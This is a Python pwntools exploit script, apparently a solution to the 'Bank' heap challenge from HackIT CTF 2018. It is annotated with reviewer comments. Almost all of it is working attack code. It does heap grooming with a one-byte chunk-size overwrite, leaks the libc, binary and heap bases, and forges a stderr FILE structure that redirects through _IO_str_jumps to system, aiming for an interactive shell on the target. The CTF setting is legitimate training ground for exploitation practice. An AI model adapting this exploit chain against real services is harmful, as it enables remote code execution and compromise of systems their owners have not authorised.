HackIT CTF 2018 Bank Reimplemented
#!/usr/bin/env python
from pwn import *
# Open gdb in a side-by-side tmux pane whenever a debugger is attached below.
context(terminal=['tmux', 'splitw', '-h'])
# libc = ELF('')   # no libc ELF is parsed; libc offsets are hard-coded further down
# The challenge binary; os/arch for pwntools' context are taken from it.
elf = ELF('./chall2-bank')
context(os='linux', arch=elf.arch)
#context(log_level='debug')   # verbose send/recv log
# 'r' connects to the 2018 CTF service (almost certainly gone by now);
# 'l' connects to a locally hosted copy of the same service.
RHOST, RPORT = "185.168.131.144", 6000
LHOST, LPORT = "127.0.0.1", 6000
def section_addr(name, elf=elf):
    """Return the address (ELF section-header field sh_addr) of section *name*.

    *elf* defaults to the module-level target binary and is captured when
    this function is defined; pass another ELF object to look inside e.g.
    a libc. If *name* is not a section, get_section_by_name presumably
    returns None and this raises AttributeError -- confirm against pwntools.
    """
    header = elf.get_section_by_name(name).header
    return header['sh_addr']
def dbg(ss):
    """Log, in hex, the value of the expression named by the string *ss*.

    *ss* goes through eval() in this function's frame, so it resolves against
    the script's globals (libc_base, bin_base, heap_base, ...). Only ever pass
    string literals written in this file -- never text received from the
    target or taken from the command line -- because eval() would execute it.
    """
    value = eval(ss)
    log.info("%s: 0x%x" % (ss, value))
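conn = None
# First CLI argument selects the target and is popped from argv:
#   r  - remote service (RHOST:RPORT)
#   l  - locally hosted copy of the service (LHOST:LPORT)
#   d  - spawn the binary under gdb with the bundled libc preloaded
#   a  - spawn locally, then attach gdb
#   anything else (or no argument) - spawn locally, no debugger
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'
# Tuple membership, not substring search: with `opt in 'rl'` an empty
# argument ('' in 'rl' is True) or the string 'rl' passed the check and then
# raised KeyError on the dict lookup instead of falling through to a local
# process.
if opt in ('r', 'l'):
    targets = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}
    conn = remote(*targets[opt])
elif opt == 'd':
    # LD_PRELOAD swaps in the challenge's libc so the hard-coded libc offsets
    # used by the exploit match. It does not replace the dynamic loader, so a
    # system ld.so that disagrees with libc-2.24.so can still crash the
    # binary at startup (patchelf --set-interpreter is the usual remedy).
    # Add `break *<addr>` lines before `continue` if a breakpoint is needed.
    gdbscript = """
set environment LD_PRELOAD=./libc-2.24.so
continue
"""
    conn = gdb.debug(['./chall2-bank'], gdbscript=gdbscript)
else:
    conn = process(['./chall2-bank'], env={'LD_PRELOAD': './libc-2.24.so'})
    if opt == 'a':
        gdb.attach(conn)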
def create(title, stat):
    """Menu option 1: open a new account named *title* with statement *stat*.

    *title* is sent raw (no newline), so the caller controls its exact bytes.
    The length sent to the service is len(stat)+1, i.e. it counts the newline
    that sendline() appends to the statement. The reply is consumed up to the
    word 'index'. The recvuntil/sendafter calls use pwntools' default timeout,
    so a prompt mismatch hangs rather than fails.
    """
    conn.sendlineafter('5. View your bank status', '1')
    conn.sendafter(' bank account:', title)
    declared_len = len(stat) + 1
    conn.sendlineafter('bank statement:', str(declared_len))
    conn.sendline(stat)
    conn.recvuntil('index')
def title(idx, title):
    """Menu option 2: replace the name of account *idx* with *title*.

    *title* is sent raw, without a trailing newline. The parameter shadows
    the function name inside the body, which is harmless here. Not used by
    the exploit sequence in this file.
    """
    conn.sendlineafter('5. View your bank status', '2')
    index_str = str(idx)
    conn.sendlineafter(' bank account:', index_str)
    conn.send(title)
def stat(idx, stat):
    """Menu option 3: replace the statement of account *idx* with *stat*.

    Unlike create(), no length is sent first; *stat* goes out with a newline
    appended. The parameter shadows the function name inside the body, which
    is harmless here. Not used by the exploit sequence in this file.
    """
    conn.sendlineafter('5. View your bank status', '3')
    index_str = str(idx)
    conn.sendlineafter(' bank account:', index_str)
    conn.sendline(stat)
def delete(idx):
    """Menu option 4: delete account *idx*.

    Nothing is read back, so the caller cannot tell whether the service
    accepted the index.
    """
    index_str = str(idx)
    conn.sendlineafter('5. View your bank status', '4')
    conn.sendlineafter(' bank account:', index_str)
def show(idx):
    """Menu option 5: ask the service to print account *idx*.

    The reply is left on the connection for the caller to parse (the exploit
    does recvuntil('Statement: ') and then reads the leaked bytes itself).
    """
    index_str = str(idx)
    conn.sendlineafter('5. View your bank status', '5')
    conn.sendlineafter(' bank account:', index_str)
# exploit
#
# NOTE(review): this script is Python 2. It concatenates str with p64()
# output ('a'*0x50+p64(...) below) and relies on `/` being integer division
# when building fake_stderr; under Python 3 both raise.
#
# Phase 1: leak a libc address and the binary's load address.
# The create/delete choreography (two small accounts, free one, two larger
# ones, free the other, ...) is presumably heap grooming that leaves a libc
# pointer readable through account 2's statement; the underlying primitive
# is not visible from this script, so the comments on the sequence are a
# reading, not a spec. Note index 0 is freed twice with creates in between,
# so the service presumably reuses freed slots -- confirm against the binary.
log.info('Pwning')
create('x'*0x8, 'a'*0x1f)
create('x'*0x8, 'a'*0x1f)
delete(0)
create('y'*0x8, 'a'*0x57)
create('y'*0x8, 'a'*0x57)
delete(1)
create('x'*0x8, 'a'*0x2f)
# This title is 17 bytes, one more than any other; the trailing 0xe1
# presumably lands on a neighbouring chunk's size field (0xe0|PREV_INUSE)
# -- TODO confirm.
create('x'*0x10+'\xe1', 'a'*0x1f)
delete(0)
create('y'*0x8, 'a'*0x57)
show(2)
conn.recvuntil('Statement: ')
# Read a 6-byte pointer out of account 2's statement (padded to 8 for u64)
# and subtract its offset inside libc. 0x397b58 is specific to the bundled
# libc-2.24.so; the commented-out value is for some other build, so every
# hard-coded libc offset below must be re-derived if the libc changes.
#libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1b58
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x397b58
dbg('libc_base')
create('x'*0x8, 'a'*0x1f)
show(2)
conn.recvuntil('Statement: ')
# Same trick for a pointer into the binary itself; 0x202010 is that
# pointer's offset from the image base (the binary is presumably PIE,
# otherwise this subtraction would be pointless).
bin_base = u64(conn.recv(6)+'\x00\x00') - 0x202010
dbg('bin_base')
# Phase 2: leak the heap base. Accounts 5..7 get the same
# small / large / 0xe1-title grooming pattern as phase 1, after which two
# deletes leave something readable through account 7's statement that the
# code treats as a heap pointer. The distinct titles ('0'*8, '1'*8, ...)
# look like markers for inspecting the heap in gdb; they carry no payload.
create('x'*0x8, 'a'*0x1f)
create('x'*0x8, 'a'*0x1f)
delete(5)
create('0'*0x8, 'a'*0x57)
create('1'*0x8, 'a'*0x57)
delete(6)
create('x'*0x8, 'a'*0x2f)
# 17-byte title again: the 0xe1 presumably overwrites a chunk size field
# -- TODO confirm.
create('x'*0x10+'\xe1', 'a'*0x1f)
delete(5)
create('2'*0x8, 'a'*0x57)
delete(6)
create('3'*0x8, 'a'*0x57)
delete(5)
delete(6)
show(7)
conn.recvuntil('Statement: ')
# 0x2d0 is the leaked pointer's offset from the start of the heap for this
# exact allocation sequence; any change to the creates/deletes above shifts it.
heap_base = u64(conn.recv(6)+'\x00\x00') - 0x2d0
dbg('heap_base')
# Phase 3: plant a libc address and a heap pointer.
create('3'*0x8, 'a'*0x57)
create('3'*0x8, 'a'*0x57)
delete(5)
delete(6)
delete(7)
# First qword of this statement is an address inside the bundled
# libc-2.24.so (libc_base+0x3984dd); what it points at is not recoverable
# from this script. ljust pads with 'x' to the usual 0x57-byte statement.
create('3'*0x8, p64(libc_base+0x3984dd).ljust(0x57, 'x'))
create('3'*0x8, 'a'*0x57)
# 0x50 filler + 7 bytes of the 0xdeadbeef qword: the 8th byte of that qword
# is the '\n' that create()'s sendline appends, which keeps the total at
# 0x57+1 = the declared length. 0xdeadbeef is presumably just a marker.
create('3'*0x8, 'a'*0x50+p64(0xdeadbeef)[:-1])
# 3 NULs + two zero qwords + a heap pointer: 0x1b bytes, far short of the
# 0x5f length declared below, so the service presumably allocates 0x5f and
# the rest of that buffer is whatever was there before -- TODO confirm.
payload = '\x00'*3 + p64(0)*2 + p64(heap_base+ 0x4f0)
print(hex(len(payload)))
# Hand-rolled create(): unlike the helper it does not wait for the menu
# prompt, uses a 7-byte title, declares 0x5f, and replaces the prompt wait
# with a fixed sleep before sending the statement. The sleep is a race --
# on a slow link the payload can arrive before the service reads it as the
# statement -- and nothing is read back, so a desync goes unnoticed.
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x5f))
time.sleep(1)
conn.sendline(payload)
create('a', 'd'*0x1f)
# Phase 4: build a fake stderr FILE (the variable name and the author's
# _IO_str_jumps / system comments say so) and deliver it in pieces.
# Layout by qword index -> value:
#   0..4    0
#   5       0x7fffffffffffffff
#   6, 7    0
#   8       (libc_base + 0x1619be - 100) / 2   (integer division, Python 2)
#   9..19   0
#   20      libc_base + 0x399770
#   21..26  0
#   27      libc_base + 0x394440 + 0xc0        _IO_str_jumps
#   28      libc_base + 0x3f480                system
# 29 qwords = 0xe8 bytes. Which FILE fields these correspond to is not
# derivable from this script; all offsets are for the bundled libc-2.24.so.
fake_stderr = ''
fake_stderr += p64(0) # 0
fake_stderr += p64(0)*3
fake_stderr += p64(0) + p64(0x7fffffffffffffff)
fake_stderr += p64(0)*2
fake_stderr += p64((libc_base + 0x1619be-100)/2) + p64(0) * 0xb
fake_stderr += p64(libc_base + 0x399770)
fake_stderr += p64(0) *3
fake_stderr += p64(0)
fake_stderr += p64(0) * 2
fake_stderr += p64(libc_base +0x394440+0xc0) # _IO_str_jumps
fake_stderr += p64(libc_base + 0x3f480) # system
# The structure is written as the statements of three new accounts:
# [0:0x60], [0x80:0xb0] and [0xd0:0xe8]. The gaps 0x60-0x80 and 0xb0-0xd0
# are never sent (they are all zero in the layout above). Declared lengths
# are 0x67, 0x37, 0x67 against 0x60, 0x30 and 0x18 bytes actually sent, so
# the declared size presumably only chooses the chunk size -- TODO confirm.
# Same sleep-instead-of-prompt race as in phase 3, with a shorter sleep.
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x67))
time.sleep(0.1)
conn.sendline(fake_stderr[0:0x60])
# Account 10 is freed before the next piece is written -- presumably so its
# chunk is reused at a specific heap position; not recoverable from here.
delete(10)
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x37))
time.sleep(0.1)
conn.sendline(fake_stderr[0x80:0x80+0x30])
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x67))
time.sleep(0.1)
conn.sendline(fake_stderr[0xd0:])
# delete(9)
# Hands the connection to the operator. If the FILE hijack fires, this is a
# shell on the target, so run it only against the local binary or a host you
# are authorised to attack; the remote address above is 2018 CTF infrastructure.
conn.interactive()